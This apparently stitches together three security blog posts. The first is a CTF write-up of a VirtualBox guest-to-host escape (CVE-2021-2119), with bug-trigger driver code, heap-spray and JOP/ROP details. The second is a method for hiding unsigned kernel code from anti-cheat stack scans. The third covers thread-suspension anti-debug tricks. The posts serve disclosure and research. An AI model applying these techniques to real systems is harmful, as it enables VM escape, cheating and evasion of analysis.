Discovering the Vulnerability

The challenge description already hints at where a bug might be:

Goal:

Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.

You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.

But you can’t do anything in the host, including modifying the guest configuration file, etc.

Hint: SCSI controller is enabled and marked as bootable.

Environment:

In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:

  • VirtualBox:6.1.16-140961-Win_x64.
  • Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
  • Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.

The only special thing about the VM is that the SCSI driver is loaded and marked bootable so that’s the place for us to start looking for vulnerabilities.

Here are the operations the SCSI device supports:

// /src/VBox/Devices/Storage/DevBusLogic.cpp
    
    // [...]

    if (fBootable)
    {
        /* Register I/O port space for BIOS access. */
        rc = PDMDevHlpIoPortCreateExAndMap(pDevIns, BUSLOGIC_BIOS_IO_PORT, 4 /*cPorts*/, 0 /*fFlags*/,
                                           buslogicR3BiosIoPortWrite,       // Write a byte
                                           buslogicR3BiosIoPortRead,        // Read a byte
                                           buslogicR3BiosIoPortWriteStr,    // Write a string
                                           buslogicR3BiosIoPortReadStr,     // Read a string
                                           NULL /*pvUser*/,
                                           "BusLogic BIOS" , NULL /*paExtDesc*/, &pThis->hIoPortsBios);
        // [...]
    }
    // [...]

The SCSI device implements a simple state machine with a global heap allocated buffer. When initiating the state machine, we can set the buffer size and the state machine will set a global buffer pointer to point to the start of said buffer. From there on, we can either read one or more bytes, or write one or more bytes. Every read/write operation will advance the buffer pointer. This means that after reading a byte from the buffer, we can’t write that same byte and vice versa, because the buffer pointer has already been advanced.

While auditing the vboxscsiReadString function, tsuro and spq found something interesting:

// src/VBox/Devices/Storage/VBoxSCSI.cpp

/**
 * @retval VINF_SUCCESS
 */
int vboxscsiReadString(PPDMDEVINS pDevIns, PVBOXSCSI pVBoxSCSI, uint8_t iRegister,
                       uint8_t *pbDst, uint32_t *pcTransfers, unsigned cb)
{
    RT_NOREF(pDevIns);
    LogFlowFunc(("pDevIns=%#p pVBoxSCSI=%#p iRegister=%d cTransfers=%u cb=%u\n",
                 pDevIns, pVBoxSCSI, iRegister, *pcTransfers, cb));

    /*
     * Check preconditions, fall back to non-string I/O handler.
     */
    Assert(*pcTransfers > 0);

    /* Read string only valid for data in register. */
    AssertMsgReturn(iRegister == 1, ("Hey! Only register 1 can be read from with string!\n"), VINF_SUCCESS);

    /* Accesses without a valid buffer will be ignored. */
    AssertReturn(pVBoxSCSI->pbBuf, VINF_SUCCESS);

    /* Check state. */
    AssertReturn(pVBoxSCSI->enmState == VBOXSCSISTATE_COMMAND_READY, VINF_SUCCESS);
    Assert(!pVBoxSCSI->fBusy);

    RTCritSectEnter(&pVBoxSCSI->CritSect);
    /*
     * Also ignore attempts to read more data than is available.
     */
    uint32_t cbTransfer = *pcTransfers * cb;
    if (pVBoxSCSI->cbBufLeft > 0)
    {
        Assert(cbTransfer <= pVBoxSCSI->cbBuf);     // --- [1] ---
        if (cbTransfer > pVBoxSCSI->cbBuf)
        {
            memset(pbDst + pVBoxSCSI->cbBuf, 0xff, cbTransfer - pVBoxSCSI->cbBuf);
            cbTransfer = pVBoxSCSI->cbBuf;  /* Ignore excess data (not supposed to happen). */
        }

        /* Copy the data and adance the buffer position. */
        memcpy(pbDst, 
               pVBoxSCSI->pbBuf + pVBoxSCSI->iBuf,  // --- [2] ---
               cbTransfer);

        /* Advance current buffer position. */
        pVBoxSCSI->iBuf      += cbTransfer;
        pVBoxSCSI->cbBufLeft -= cbTransfer;         // --- [3] ---

        /* When the guest reads the last byte from the data in buffer, clear
           everything and reset command buffer. */

        if (pVBoxSCSI->cbBufLeft == 0)              // --- [4] ---
            vboxscsiReset(pVBoxSCSI, false /*fEverything*/);
    }
    else
    {
        AssertFailed();
        memset(pbDst, 0, cbTransfer);
    }
    *pcTransfers = 0;
    RTCritSectLeave(&pVBoxSCSI->CritSect);

    return VINF_SUCCESS;
}

We can fully control cbTransfer in this function. The function initially makes sure that we’re not trying to read more than the buffer size [1]. Then, it copies cbTransfer bytes from the global buffer into another buffer [2], which will be sent to the guest driver. Finally, cbTransfer bytes get subtracted from the remaining size of the buffer [3] and if that remaining size hits zero, it will reset the SCSI device and require the user to reinitiate the machine state, before reading any more bytes.

So much for the logic, but what’s the issue here? There is a check at [1] that ensures no single read operation reads more than the buffer’s size. But this is the wrong check. It should verify, that no single read can read more than the buffer has left. Let’s say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This will advance the buffer pointer to point to the 40th byte. Now we call the function again and tell it to read 2 more bytes. The check in [1] won’t bail out, since 2 is less than the buffer size of 40, however we will have read 41 bytes in total. Additionally, this will cause the subtraction in [3] to underflow and cbBufLeft will be set to UINT32_MAX-1. This same cbBufLeft will be checked when doing write operations and since it is very large now, we’ll be able to also write bytes that are outside of our buffer.

Getting OOB read/write

We understand the vulnerability, so it’s time to develop a driver to exploit it. Ironically enough, the “getting a driver to build” part was actually one of the hardest (and most annoying) parts of the exploit development. malle got to building VirtualBox from source in order for us to have symbols and a debuggable process while 0x4d5a came up with the idea of using the HEVD driver as a base for us to work with, since it does some similar things to what we need. Now let’s finally start writing some code.

Here’s how we triggered the bug:

void exploit() {
    static const uint8_t cdb[1] = {0};
    static const short port = 0x434;
    static const uint32_t buffer_size = 1024;

    // reset the state machine
    __outbyte(port+3, 0);

    // initiate a write operation
    __outbyte(port+0, 0); // TargetDevice (0)
    __outbyte(port+0, 1); // direction (to device)
    
    __outbyte(port+0, ((buffer_size >> 12) & 0xf0) | (sizeof(cdb) & 0xf)); // buffer length hi & cdb length
    __outbyte(port+0, buffer_size);                                        // bugger length low
    __outbyte(port+0, buffer_size >> 8);                                   // buffer length mid
    
    for(int i = 0; i < sizeof(cdb); i++)
        __outbyte(port+0, cdb[i]);


    // move the buffer pointer to 8 byte after the buffer and the remaining bytes to -8
    char buf[buffer_size];
    __inbytestring(port+1, buf, buffer_size - 1)    // Read bufsize-1
    __inbytestring(port+1, buf, 9)                  // Read 9 more bytes

    for(int i = 0; i < sizeof(buf); i += 4)
        *((uint32_t*)(&buf[i])) = 0xdeadbeef
    for(int i = 0; i < 10000; i++)
        __outbytestring(port+1, buf, sizeof(buf))
}

The driver first has to initiate the SCSI state machine with a bufsize. Then we read bufsize-1 bytes and then we read 9 bytes. We chose 9 instead of 2 byte in order to have the buffer pointer 8 byte aligned after the overflow. Finally, we overwrite the next 10000kb after our allocated buffer+8 with 0xdeadbeef.

After loading this driver in the win7 guest, this is what we get:

As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user-space. The driver was modified to accept this Req struct via an IOCTL:

enum operations {
    OPERATION_OUTBYTE = 0,
    OPERATION_INBYTE = 1,
    OPERATION_OUTSTR = 2,
    OPERATION_INSTR = 3,
};

typedef struct {
    volatile unsigned int port;
    volatile unsigned int operation;
    volatile unsigned int data_byte_out;
} Req;

This enables us to use the driver as a bridge to communicate with the SCSI device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).

The bug gives us a liner heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution so let’s put this bug to use!

Leaking vboxc.dll and heap addresses

We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.

This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:

  1. Contains a pointer into a dll
  2. Contains a heap address
  3. (Contains some kind of function pointer which might get useful later on)

After going through some options, we eventually opted for an HGCMMsgCall spray. Here’s it’s (stripped down) structure. It’s pretty big so I removed any parts that we don’t care about:

class HGCMMsgCall: public HGCMMsgHeader
{
    // A list of parameters including a 
    // char[] with controlled contents
    VBOXHGCMSVCPARM *paParms;
    
    // [...]
};

class HGCMMsgHeader: public HGCMMsgCore
{
    public:
        // [...]
        /* Port to be informed on message completion. */
        PPDMIHGCMPORT pHGCMPort;
};

typedef struct PDMIHGCMPORT
{
    // [...]
    /**
     * Checks if @a pCmd was cancelled.
     *
     * @returns true if cancelled, false if not.
     * @param   pInterface          Pointer to this interface.
     * @param   pCmd                The command we're checking on.
     */
    DECLR3CALLBACKMEMBER(bool, pfnIsCmdCancelled,(PPDMIHGCMPORT pInterface, PVBOXHGCMCMD pCmd));
    // [...]

} PDMIHGCMPORT;

class HGCMMsgCore : public HGCMReferencedObject
{
    private:
        // [...]
        /** Next element in a message queue. */
        HGCMMsgCore *m_pNext;
        /** Previous element in a message queue.
         *  @todo seems not necessary. */
        HGCMMsgCore *m_pPrev;
        // [...]
};

It contains a VTable pointer, two heap pointers (m_pNext and m_pPrev) because HGCMMsgCall objects are managed in a doubly linked list and it has a callback function pointer in m_pfnCallback so HGCMMsgCall definitely fits the bill for a good spray target. Another nice thing is that we’re able to call the pHGCMPort->pfnIsCmdCancelled pointer at any point we like. This works because this pointer gets invoked on all the already allocated messages, whenever a new message is created. HGCMMsgCall’s size is 0x70, so we’ll have to initiate the SCSI state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.

Conveniently enough, niklasb has already prepared a function we can borrow to spray HGCMMsgCall objects.

Calling niklas’ wait_prop function will allocate a HGCMMsgCall object with a controlled pszPatterns field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.

Spraying on a Low-fragmentation Heap can be a little tricky but after some trial and error we got to the following spray strategy:

  1. We iterate 64 times
  2. Each time we create a client and spray 16 HGCMMsgCalls

That way, we seemed to reliably get a bunch of the HGCMMsgCalls ahead of our leak object which allows us to read and write their fields.

First things first: getting the code leak is simple enough. All we have to do is to read heap memory until we find something that matches the structure of one of our HGCMMsgCall and read the first quad-word of said object. The VTable points into VBoxC.dll so we can use this leak to calculate the base address of VBoxC.dll for future use.

Getting the heap leak is not as straight forward. We can easily read the m_pNext or m_pPrev fields to get a pointer to some other HGCMMsgCall object but we don’t have any clue about where that object is located relatively to our current buffer position. So reading m_pNext and m_pPrev of one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse some of their properties to match an object A to it’s next neighbor B.

This works because of this property:

addr(B) - addr(A) == A->m_pNext - B->m_pPrev

To get the address of B, we have to do the following:

  1. Read object A and save the pointers
  2. Take note of how many bytes we had to read until we found the next object B in a variable x
  3. Read object B and save the pointers
  4. If A->m_pNext - B->m_pPrev == x we most likely found the right neighbor and know that B is at A->m_pNext. If not, we just keep reading objects

This is pretty fast and works somewhat reliably. Equipped with our heap address and VBoxC.dll base address leak, we can move on to hijacking the execution flow.

Getting RIP control

Remember those pfnIsCmdCancelled callbacks? Those will make for a very short “Getting RIP control” section… :P

There’s really not that much to this part of the exploit. We only have to read heap data until we find another one of our HGCMMsgCalls and overwrite m_pfnCallback. As soon as a new message gets allocated, this method is called on our corrupted object with a malicious pHgcmPort->pfnIsCmdCancelled field.

/**
 * @interface_method_impl{VBOXHGCMSVCHELPERS,pfnIsCallCancelled}
 */
/* static */ DECLCALLBACK(bool) HGCMService::svcHlpIsCallCancelled(VBOXHGCMCALLHANDLE callHandle)
{
    HGCMMsgHeader *pMsgHdr = (HGCMMsgHeader *)callHandle;
    AssertPtrReturn(pMsgHdr, false);

    PVBOXHGCMCMD pCmd = pMsgHdr->pCmd;
    AssertPtrReturn(pCmd, false);

    PPDMIHGCMPORT pHgcmPort = pMsgHdr->pHGCMPort;   // We corrupted pHGCMPort
    AssertPtrReturn(pHgcmPort, false);

    return pHgcmPort->pfnIsCmdCancelled(pHgcmPort, pCmd);   // --- Profit ---
}

Internally, svcHlpIsCallCancelled will load pHgcmPort into r8 and execute a jmp [r8+0x10] instruction. Here’s what happens if we corrupt m_pfnCallback with 0x0000000041414141:

Code execution

At this point, we are able to redirect code execution to anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these one-gadgets which are basically addresses you jump to, that will instantly give you a shell. But sadly there is no leak-kernel32dll-set-rcx-to-calc-and-call-WinExec one-gadget in VBoxC.dll which means we’ll have to get a little creative once more. ROP is not an option because we don’t have stack control so the only thing left is JOP(Jump-Oriented-Programming).

JOP requires some kind of register control, but at the point at which our callback is invoked we only control a single register, r8. An additional constraint is that since we only leaked a pointer from VBoxC.dll we’re limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.

Sounds easy enough, let’s see what we can come up with :P

Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that’ll have to do. But we can’t just go around writing stuff to the heap because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt us. So we need to get a buffer allocated first and write to that. We can abuse the pszPatterns field in our spray for that. If we extend the pattern size to 0x70 bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining 0x68 bytes with our payload. We’re the ones who allocated that string so it won’t get free’d randomly so long as we hold a reference to it and since we already leaked a heap address, we’re also able to calculate the address of our string and can use it in the JOP chain.

After spending ~30min straight reading through VBoxC.dll assembly together with localo, we finally came up with a way to get from r8 control to rsp control. I had trouble figuring out a way to describe the JOP chain, so css wizard localo created an interactive visualization in order to make following the chain easier. To simplify things even further, the visualization will show all registers with uncontrolled contents as XXX and any reading or uncontrolled writing operations to or from those registers will be ignored.

Let’s assume the JOP payload in our string is located at 0x1230 and r8 points to it. We trigger the callback, which will execute the jmp [r8+0x10]. You can click through the slides to understand what happens:

We managed to get rsp to point into our string and the next ret will kickstart ROP execution. From this point on, it’s just a matter of crafting a textbook WinExec("calc\x00") ROP-chain. But for the sake of completeness I’ll mention the gist of it. First, we read the address of a symbol from VBoxC.dll’s IAT. The IAT is comparable to a global offset table on linux and contains pointers to dynamically linked library symbols. We’ll use this to leak a pointer into kernel32.dll. Then we can calculate the runtime address of WinExec() in kernel32.dll, set rcx to point to "calc\x00" and call WinExec which will pop a calculator.

However there is a little twist to this. A keen eye might have noticed that we set rbp to 0x10000000 and that we are using a leave; jmp rax gadget to get to WinExec in rop_gadget_5 instead of just a simple jmp rax. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling WinExec with the stack pointer still pointing into our heap payload. It turns out, that WinExec sets up a rather large stack frame and the distance between out fake stack and the start of the heap isn’t always large enough to contain it. Therefore we were getting paging issues. Luckily, 0x4d5a and localo knew from reading this blog post about the vram section which has weak randomisation and it turns out that the range from 0xcb10000 to 0x13220000 is always mapped by that section. So if we set rbp to 0x10000000 and call a leave; jmp rax it will set the stack pointer to 0x10000000 before calling WinExec and thereby giving it enough space to do all the stack setup it likes ;)

Demo

‘nuff said! Here’s the demo:

You can find this version of our exploit here.

Credits

Writing this exploit was a joint effort of a bunch of people.

  • ESPR’s spq, tsuro and malle who don’t need an introduction :D

  • My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo

  • niklasb for his prior work and for some helpful pointers!

“A ROP chain a day keeps the doctor away. Immer dran denken, hat mein Opa immer gesagt.”

~ Niklas Baumstark (2021)

  • myself, Ilias Morad aka A2nkF :)

I had the pleasure of working with this group of talented people over the course of multiple sleepless nights and days during and even after the CTF was already over just to get the exploit working properly on a release build of VirtualBox and to improve stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you :D

Conclusion

This was my first time working with VirtualBox so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of virtual box with 3h left in the CTF but sadly, we weren’t able to port it to a release build in time for the CTF due to anti-debugging in VirtualBox which made figuring out what exactly was breaking very hard. The next day we rebuilt VirtualBox without the anti-debugging/process hardening and finally properly ported the exploit to work with the latest release build of VirtualBox. We recommend you disable SCSI on your VirtualBox until this bug is patched.

The Organizers even agreed to demo our exploit in a live stream on their twitch channel afterwards and after some offset issues we finally got everything working!

I’d like to thank ChenNan again for creating the challenge and RealWorld CTF for being the excellent CTF we all grew to love. I’m looking forward to next years edition, where we hopefully will have an on-site finale in China again :).

This exploit was assigned CVE-2021-2119.

Part two…

This was the initial version of our exploit and it turned out to have a couple of issues which caused it to be a little fragile and somewhat unreliable. After the CTF was over we got together once more and attempted to identify and mitigate these weaknesses. localo will explain these issues and our workarounds in part two of this post (coming soon!).

Stay safe and happy pwning!

Hiding execution of unsigned code in system threads

12 January 2021 at 00:00
By: drew

Anti-cheat development is, by nature, reactive; anti-cheats exist to respond to and thwart a videogame’s population of cheaters. For instance, a videogame with an exceedingly low amount of cheaters would have little need for an anti-cheat, while a videogame rife with cheaters would have a clear need for an anti-cheat. In order to catch cheaters, anti-cheats will employ as many methods as possible. Unfortunately, anti-cheats are not omniscient; they can not know of every single method or detection vector to catch cheaters. Likewise, the game hacks themselves must continue to discover new or unique methods in order to evade anti-cheats.

The Reactive Development Cycle of Game Hacking

This brings forth a reactive and continuous development cycle, for both the cheats and anti-cheats: the opposite party (cheat or anti-cheat) will employ a unique method to circumvent the adjacent party (anti-cheat or cheat) which, in response, will then do the same.

One such method employed by an increasing number of anti-cheats is to execute core anti-cheat functions from within the operating system’s kernel. A clear advantage over the alternative (i.e. usermode execution) is in the fact that, on Windows NT systems, the anti-cheat can selectively filter which processes are able to interact with the memory of the game process in which they are protecting, thus nullifying a plethora of methods used by game hacks.

In response to this, many (but not all) hack developers made (or are making) the decision to do the same; they too would, or will, execute their hack, either wholly or in part, from within the operating system’s kernel, thus nullifying what the anti-cheats had done.

Unlike with anti-cheats, however, this decision carries with it numerous concessions: namely, the fact that, for various reasons, it is most convenient (or it is only practical) to execute the hack as an unsigned kernel driver running without the kernel’s knowledge; the “driver” is typically a region of executable memory in the kernel’s address space and is never loaded or allocated by the kernel. In other words, it is a “manually-mapped” driver, loaded by a tool used by a game hack.

This ultimately provides anti-cheats with many opportunities to detect so-called “kernel-mode” or “ring 0” game hacks (noting that those terms are typically said with a marketable significance; they are literally used to market such game hacks, as if to imply robustness or security); if the anti-cheat can prove that the system is executing, or had executed, unsigned code, it can then potentially flag a user as being a cheater.

Analyzing a Thread’s Kernel Stack

One such method - the focus of this article, in fact - of detecting unsigned code execution in the kernel is to iterate each thread that is running in the system (optionally deciding to only iterate threads associated with the system process, i.e. system threads) and to initiate some kind of stack trace.

Bluntly, this allows the anti-cheat to quite effectively determine if a cheat were executing unsigned code. For example, some anti-cheats (e.g. BattlEye) will queue to each system thread an APC which will then initiate a stack trace. If the stack trace returns an instruction pointer that is not within the confines of any loaded kernel driver, the anti-cheat can then know that it may have encountered a system thread that is executing unsigned code. Furthermore, because it is a stack trace and not a direct sampling of the return instruction pointer, it would work quite reliably, even if a game hack were, for example, executing a spin-loop or continuous wait; the stack trace would always lead back to the unsigned code.

It is quite clear to any cheat developer that they can respond to this behavior by simply running their thread(s) with kernel APCs disabled, preventing delivery of such APCs and avoiding the detection vector. As is will be seen, however, this method does not entirely prevent detection of unsigned code execution.

(Copying Out, Then) Analyzing a Thread’s Kernel Stack

Certain anti-cheats - EasyAntiCheat, in particular - had a much more apt method of generating a pseudo-stacktrace: instead of generating a stack trace with a blockable APC, why not copy the contents of the thread’s kernel stack asynchronously? Continuing the reactive cheat-anti-cheat development cycle, EasyAntiCheat had opted to manually search for instances of nonpaged code pointers that may have been left behind as a result of system thread execution.

While the downsides of this method are debatable, the upside is quite clear: as long as the thread is making procedure calls (e.g. x86 call instruction) from within its own code, either to kernel routines or to its own, and regardless of its IRQL or if the thread is even running, its execution will leave behind detectable traces on its stack in the form of pointers to its own code which can be extracted and analyzed.

Callouts: Continuing The Reactive Development Cycle

Proposed is the “callout” method of system thread execution, born from the recognition that:

  1. A thread’s kernel stack, as identified by the kernel stack pointer in a thread’s ETHREAD object, can be analyzed asynchronously by a potential anti-cheat to detect traces of unsigned code execution; and that
  2. To be useful in most cases, a system thread must be able to make calls to most external NT kernel or executive procedures with little compromise.

The Life-cycle of the Callout Thread

The life-cycle of a callout thread is quite simple and can be used to demonstrate its implementation:

  • Before thread creation:
    • Allocate a non-paged stack to be loaded by the thread; the callout thread’s “real stack”
    • Allocate shellcode (ideally in executable memory not associated with the main driver module) which disables interrupts, preserves the old/kernel stack pointer (as it was on function entry), loads the real stack, and jumps to an initialization routine (the callout thread’s “bootstrap routine”)
    • Create a system thread (i.e. PsCreateSystemThread) whose start address points to the initialization shellcode
  • At thread entry (i.e. the bootstrap routine):
    • Preserve the stack pointer that had been given to the thread at thread entry (this must be given by the shellcode)
    • (Optionally) Iterate the thread’s old/kernel stack pointer, ceasing iteration at the stack base, eliminating any references/pointers to the initialization shellcode
    • (Optionally) Eliminate references to the initialization shellcode within the thread’s ETHREAD; for example, it may be worth changing the thread’s start address
    • (Optionally, but recommended) Free the memory containing the initialization shellcode, if it was allocated separately from the driver module
    • Proceed to thread execution

In clearer terms, the callout thread spends most of its time executing the driver’s unsigned code with interrupts disabled and with its own kernel stack - the real stack. It can also attempt to wipe any other traces of its execution which may have been present upon its creation.

The Usefulness of the Callout Thread

The callout thread must also be capable of executing most, if not all, NT kernel and executive procedures. As proposed, this is effectively impossible; the thread must run with interrupts disabled and with its own stack, thus creating an obvious problem as most procedures of interest would run at an IRQL <= DISPATCH_LEVEL. Furthermore, the NT IRQL model may be liable to ignore our setting of the interrupt flag, causing most routines to unpredictibly enter a deadlock or enable interrupts without our consent.

A mechanism to allow for a callout thread to invoke these routines of interest, the callout mechanism, is therefore used to:

  1. Provide a routine which can be used to conveniently invoke (“call out”) an external function; and in this routine,
  2. Load the thread’s original/kernel stack pointer;
  3. Copy function arguments on to the kernel thread’s stack from the real stack;
  4. Enable interrupts;
  5. Invoke the requested routine (within the same instruction boundary as when interrupts are enabled);
  6. Cleanly return from the routine without generating obvious stack traces (e.g. function pointers);
  7. Load the real stack pointer and disable the interrupt flag, and do so before returning to unsigned code; and
  8. Continue execution, preserving the function’s return value

While somewhat complicated, the callout mechanism can be achieved easily and, to a reasonable degree, portably, using two widely-available ROP gadgets from within the NT kernel.

The Usefulness of IRET(Q)

The constraint of needing to load a new stack pointer, interrupt flag, and interrupt pointer within an instruction boundary was immediately satisfied by the IRET instruction.

For those unfamiliar, the IRET (lit. “interrupt return”) instruction is intended to be used by an operating system or executive (here, the NT kernel) to return from an interrupt routine. To support the recognition of an interrupt from any mode of execution, and to generically resume to any mode of execution, the processor will need to (effectively) preserve the instruction pointer, stack pointer, CPL or privilege level (through the CS and SS selectors; and while they have a more general use-case, this is effectively what is preserved on most operating systems with a flat memory model), and RFLAGS register (as interrupts may be liable to modify certain flags).

To report this information to the OS interrupt handler, the CPU will, in a specific order:

  1. Push the SS (stack segment selector) register;
  2. Push the RSP (stack pointer) register;
  3. Push the RFLAGS (arithmetic/system flags) register;
  4. Push the CS (code segment selector) register;
  5. Push the RIP (instruction pointer) register; and, for some exception-class interrupts,
  6. Push an error code which may describe certain interrupt conditions (e.g. a page fault will know if the fault was caused by a non-present page, or if it were caused by a protection violation)

Note that the error code is not important to the CPU and must be accounted for by the interrupt handler. Each operation is an 8-byte push, meaning that, when the interrupt handler is invoked, the stack pointer will point to the preserved RIP (or error code) values.

It is hopefully obvious as to how, approximately, the IRET instruction would be implemented:

  1. Pop a value from the stack to retrieve the new instruction pointer (RIP)
  2. Pop a value from the stack to retrieve the new code segment selector (CS)
  3. Pop a value from the stack to retrieve the new arithmetic/system flags register (RFLAGS)
  4. Pop a value from the stack to retrieve the new stack pointer (RSP)
  5. Pop a value from the stack to retrieve the new stack segment selector (SS)

Or, as modeled as a series of pseudo-assembly instructions,

GENERIC_INTERRUPT:

;note that all push and pop operations are 8 bytes (64 bits) wide!
push ss
push rsp
push rflags
push cs
push rip ;return instruction pointer
;optionally, push a zero-extended 4-byte error code. any interrupt which pushes an error code must have its handler add 8 bytes to their instruction pointer before executing its IRET.

IRET:

pop rip ;pop return instruction pointer into RIP. do not treat this as a series of regular assembly instructions; treat it instead as CPU microcode!
pop cs
pop rflags
pop rsp
pop ss

The callout mechanism uses the IRET instruction to accomplish its constraints, as the desired RFLAGS (which holds the interrupt flag), instruction pointer, and stack pointer can be loaded by the instruction at the same time (within an instruction boundary).

ROP; Chaining It All Together

To reiterate, the callout routine uses IRET to change the instruction pointer, stack pointer, and interrupt flag within the same instruction boundary in order to jump to external procedures with the interrupt flag enabled. This must be done within an instruction boundary to prevent unfortunately-timed external interrupts from being received just before the external procedure call.

It, however, must also be able to return from the external procedure call without leaving unsigned code pointers on the kernel stack; furthermore, it must also not rely on unlikely/unaligned ROP gadgets (e.g. a cli;ret sequence) which may not exist on future NT kernel builds. Thus also required is an IRET instruction to be executed upon the routine’s completion.

It must be recognized that the nature of the IRET instruction is such that the return instruction pointer is located on the stack. However, it is also recognized that a new stack pointer is loaded. We can therefore use IRET to load the callout thread’s real stack, with the stack pointer pointing to the actual return address.

This eliminates the problem of code pointers being present in the kernel stack; the return address back to our thread’s execution is located on another stack loaded by IRET and which isn’t obviously visible on a stack trace. To facilitate this, the stack frame loaded by the IRET gadget must be such that the return instruction pointer simply contains a RET instruction.

So, the ideal stack frame when calling an external procedure is as such:

  1. IRET return data, where the return address is a RET instruction within ntoskrnl.exe (or any region of signed code), and where the stack pointer to load is the thread’s real stack; which would have a return address pushed on to it; and
  2. The address of an IRET instruction within a region of signed code

Within most, if not all, versions of ntoskrnl.exe, this can be achieved with a simple RET instruction (0xC3 byte); along with the following gadget:

mov rsp, rbp
mov rbp, [rbp + some_offset] ;where some_offset could be liable to change
add rsp, some_other_offset
iretq

This also slightly modifies the mechanism of the ROP chain in that it must also load a pointer to the desired IRET frame in RBP when calling the function. Thankfully, the x64 calling convention specifies the RBP register as non-volatile, or unchanging across function calls, meaning that we can initialize it with our desired pointer when invoking the external procedure. It also means that the callout mechanism is permitted to allocate a non-paged region of memory to be given in RBP; preventing it from having to keep an IRET frame on the kernel stack. This notes, of course, the potential for an awful race condition where an interrupt is received in between the mov rsp, rbp and iretq instructions; the stack pointer value may point to memory that is insufficient to use for stack operations.

In having the external procedure return to the above IRET gadget, we can easily return to our unsigned code without ever leaking unsigned code pointers on the kernel stack.

Implementation

An example implementation of the callout mechanism can be found here.

New year, new anti-debug: Don’t Thread On Me

4 January 2021 at 23:00
By: jm

With 2020 over, I’ll be releasing a bunch of new anti-debug methods that you most likely have never seen. To start off, we’ll take a look at two new methods, both relating to thread suspension. They aren’t the most revolutionary or useful, but I’m keeping the best for last.

Bypassing process freeze

This one is a cute little thread creation flag that Microsoft added into 19H1. Ever wondered why there is a hole in thread creation flags? Well, the hole has been filled with a flag that I’ll call THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE (I have no idea what it’s actually called) whose value is, naturally, 0x40.

To demonstrate what it does, I’ll show how PsSuspendProcess works:

NTSTATUS PsSuspendProcess(_EPROCESS* Process)
{
  const auto currentThread = KeGetCurrentThread();
  KeEnterCriticalRegionThread(currentThread);

  NTSTATUS status = STATUS_SUCCESS;
  if ( ExAcquireRundownProtection(&Process->RundownProtect) )
  {
    auto targetThread = PsGetNextProcessThread(Process, nullptr);
    while ( targetThread )
    {
      // Our flag in action
      if ( !targetThread->Tcb.MiscFlags.BypassProcessFreeze )
        PsSuspendThread(targetThread, nullptr);

      targetThread = PsGetNextProcessThread(Process, targetThread);
    }
    ExReleaseRundownProtection(&Process->RundownProtect);
  }
  else
    status = STATUS_PROCESS_IS_TERMINATING;

  if ( Process->Flags3.EnableThreadSuspendResumeLogging )
    EtwTiLogSuspendResumeProcess(status, Process, Process, 0);

  KeLeaveCriticalRegionThread(currentThread);
  return status;
}

So as you can see, NtSuspendProcess that calls PsSuspendProcess will simply ignore the thread with this flag. Another bonus is that the thread also doesn’t get suspended by NtDebugActiveProcess! As far as I know, there is no way to query or disable the flag once a thread has been created with it, so you can’t do much against it.

As far as its usefulness goes, I’d say this is just a nice little extra against dumping and causes confusion when you click suspend in Processhacker, and the process continues to chug on as if nothing happened.

Example

For example, here is a somewhat funny code that will keep printing I am running. I am sure that seeing this while reversing would cause a lot of confusion about why the hell one would suspend his own process.

#define THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE 0x40

NTSTATUS printer(void*) {
    while(true) {
        std::puts("I am running\n");
        Sleep(1000);
    }
    return STATUS_SUCCESS;
}

HANDLE handle;
NtCreateThreadEx(&handle, MAXIMUM_ALLOWED, nullptr, NtCurrentProcess(),
                 &printer, nullptr, THREAD_CREATE_FLAGS_BYPASS_PROCESS_FREEZE,
                 0, 0, 0, nullptr);

NtSuspendProcess(NtCurrentProcess());

Suspend me more

Continuing the trend of NtSuspendProcess being badly behaved, we’ll again abuse how it works to detect whether our process was suspended.

The trick lies in the fact that suspend count is a signed 8-bit value. Just like for the previous one, here’s some code to give you an understanding of the inner workings:

ULONG KeSuspendThread(_ETHREAD *Thread)
{
  auto irql = KeRaiseIrql(DISPATCH_LEVEL);
  KiAcquireKobjectLockSafe(&Thread->Tcb.SuspendEvent);

  auto oldSuspendCount = Thread->Tcb.SuspendCount;
  if ( oldSuspendCount == MAXIMUM_SUSPEND_COUNT ) // 127
  {
    _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
    KeLowerIrql(irql);
    ExRaiseStatus(STATUS_SUSPEND_COUNT_EXCEEDED);
  }

  auto prcb = KeGetCurrentPrcb();
  if ( KiSuspendThread(Thread, prcb) )
    ++Thread->Tcb.SuspendCount;

  _InterlockedAnd(&Thread->Tcb.SuspendEvent.Header.Lock, 0xFFFFFF7F);
  KiExitDispatcher(prcb, 0, 1, 0, irql);
